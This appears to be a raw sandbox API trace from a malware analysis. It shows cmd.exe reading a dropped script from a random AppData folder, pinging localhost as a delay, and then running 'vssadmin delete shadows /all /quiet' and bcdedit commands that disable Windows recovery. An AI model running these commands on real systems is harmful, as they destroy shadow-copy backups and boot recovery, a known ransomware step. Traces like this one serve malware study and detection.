lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0178.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.658] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.658] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.658] 
GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.658] SetConsoleInputExeNameW () returned 0x1 [0178.658] GetConsoleOutputCP () returned 0x1b5 [0178.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.659] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.659] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0178.659] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0178.659] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.659] SetFilePointer (in: hFile=0x58, lDistanceToMove=269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.659] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.659] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.659] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x12f, lpOverlapped=0x0) returned 1 [0178.659] SetFilePointer (in: hFile=0x58, lDistanceToMove=291, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0178.660] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=22, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 10 localhost\r\nuv\r\nte \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\n") returned 22 [0178.660] GetFileType 
(hFile=0x58) returned 0x1 [0178.660] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.660] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0178.660] _tell (_FileHandle=3) returned 291 [0178.660] _close (_FileHandle=3) returned 0 [0178.661] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0178.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.661] GetFileType (hFile=0x7) returned 0x2 [0178.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0178.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.661] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0178.661] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.661] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.661] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0178.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.661] GetFileType (hFile=0x7) returned 0x2 [0178.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0178.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0178.662] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] GetFileType (hFile=0x7) returned 0x2 [0178.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0178.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a0d90*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x4a0d90*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0178.662] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" -n 10 localhost ") returned 17 [0178.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] GetFileType (hFile=0x7) returned 0x2 [0178.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0178.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.663] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x11) returned 1 [0178.663] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0178.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.663] GetFileType (hFile=0x7) returned 0x2 [0178.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0178.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.663] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0178.664] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0178.664] _wcsicmp 
(_String1="ping", _String2="ERASE") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0178.664] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0178.664] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0178.664] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0178.664] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0178.664] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0178.664] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0178.664] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0178.664] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0178.664] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0178.664] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 
[0178.664] _wcsicmp (_String1="ping", _String2="START") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0178.664] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0178.664] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0178.664] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0178.664] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0178.664] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0178.664] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0178.664] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0178.664] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.664] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.665] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0178.665] GetLastError () returned 0x2 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0178.665] GetLastError () returned 0x2 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x491de0 
[0178.665] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0178.665] GetLastError () returned 0x2 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x491de0 [0178.666] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0178.666] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.666] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.666] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.666] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0178.666] GetLastError () returned 0x2 [0178.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0178.667] GetLastError () returned 0x2 [0178.667] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4921c8 [0178.667] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0178.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0178.667] GetLastError () returned 0x2 [0178.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4921c8 [0178.667] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0178.667] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.667] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.667] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.667] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0178.667] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0178.667] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.668] lstrcmpW 
(lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0178.668] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 10 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 10 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="ping -n 10 localhost", lpProcessInformation=0x28ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xca4, dwThreadId=0x5fc)) returned 1 [0178.670] CloseHandle (hObject=0x58) returned 1 [0178.670] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.670] GetEnvironmentStringsW () returned 0x4a0548* [0178.670] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0178.670] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0190.490] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0190.490] CloseHandle (hObject=0x54) returned 1 [0190.490] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0190.490] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0190.490] GetEnvironmentStringsW () returned 0x4a0548* [0190.490] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0190.490] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0190.490] GetEnvironmentStringsW () returned 0x4a0548* [0190.491] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0190.491] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) 
[0190.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.491] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.491] SetConsoleInputExeNameW () returned 0x1 [0190.491] GetConsoleOutputCP () returned 0x1b5 [0190.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.491] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.491] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0190.492] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0190.492] _get_osfhandle (_FileHandle=3) returned 0x54 [0190.492] SetFilePointer (in: hFile=0x54, lDistanceToMove=291, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0190.492] _get_osfhandle (_FileHandle=3) returned 0x54 [0190.492] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0190.492] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x119, lpOverlapped=0x0) returned 1 [0190.493] SetFilePointer (in: hFile=0x54, lDistanceToMove=455, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0190.493] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 
lpMultiByteStr=0x4a9e6640, cbMultiByte=164, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="cmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 164 [0190.493] GetFileType (hFile=0x54) returned 0x1 [0190.493] _get_osfhandle (_FileHandle=3) returned 0x54 [0190.493] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0190.495] _tell (_FileHandle=3) returned 455 [0190.495] _close (_FileHandle=3) returned 0 [0190.495] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0190.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.495] GetFileType (hFile=0x7) returned 0x2 [0190.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0190.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.495] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0190.496] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0190.496] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.496] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0190.496] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0190.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.496] GetFileType 
(hFile=0x7) returned 0x2 [0190.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0190.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] GetFileType (hFile=0x7) returned 0x2 [0190.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f694 | out: lpMode=0x28f694) returned 1 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x491bd0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x28f6c0, lpReserved=0x0 | out: lpBuffer=0x491bd0*, lpNumberOfCharsWritten=0x28f6c0*=0x7) returned 1 [0190.497] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6cc | out: _Buffer=" /C vssadmin.exe delete shadows /all /quiet ") returned 45 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] GetFileType (hFile=0x7) returned 0x2 [0190.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f68c | out: lpMode=0x28f68c) returned 1 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x28f6b8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6b8*=0x2d) returned 1 [0190.498] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x28f6e8 | out: _Buffer=" & ") returned 3 [0190.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.498] GetFileType (hFile=0x7) returned 0x2 [0190.498] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0190.498] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6a8 | out: lpMode=0x28f6a8) returned 1 [0190.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.498] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f6d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6d4*=0x3) returned 1 [0190.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.498] GetFileType (hFile=0x7) returned 0x2 [0190.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.499] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f664 | out: lpMode=0x28f664) returned 1 [0190.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.499] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x48eb68*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x28f690, lpReserved=0x0 | out: lpBuffer=0x48eb68*, lpNumberOfCharsWritten=0x28f690*=0xb) returned 1 [0190.499] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f69c | out: _Buffer=" /set {default} recoveryenabled no ") returned 36 [0190.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.499] GetFileType (hFile=0x7) returned 0x2 [0190.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.499] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f65c | out: lpMode=0x28f65c) returned 1 [0190.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x28f688, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f688*=0x24) returned 1 [0190.500] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x28f6b8 | out: _Buffer=" & ") returned 3 [0190.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] GetFileType (hFile=0x7) returned 0x2 [0190.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.500] 
GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f678 | out: lpMode=0x28f678) returned 1 [0190.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f6a4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6a4*=0x3) returned 1 [0190.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] GetFileType (hFile=0x7) returned 0x2 [0190.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f664 | out: lpMode=0x28f664) returned 1 [0190.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.501] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480810*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x28f690, lpReserved=0x0 | out: lpBuffer=0x480810*, 